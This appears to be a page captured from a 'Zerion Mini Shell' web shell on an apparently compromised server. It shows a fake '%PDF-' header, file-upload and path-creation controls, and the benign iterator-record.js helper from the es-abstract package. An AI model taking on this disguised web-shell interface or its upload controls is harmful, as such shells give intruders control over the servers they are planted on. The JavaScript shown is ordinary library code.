%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/vacivi36/.trash/vacivitta/node_modules/es-abstract/helpers/records/
Upload File :
Create Path :
Current File : /home/vacivi36/.trash/vacivitta/node_modules/es-abstract/helpers/records/iterator-record.js

'use strict';

var hasOwn = require('hasown');

module.exports = function isIteratorRecord(value) {
	return !!value
		&& typeof value === 'object'
		&& hasOwn(value, '[[Iterator]]')
		&& hasOwn(value, '[[NextMethod]]')
		&& hasOwn(value, '[[Done]]')
		&& typeof value['[[Done]]'] === 'boolean';
};

Zerion Mini Shell 1.0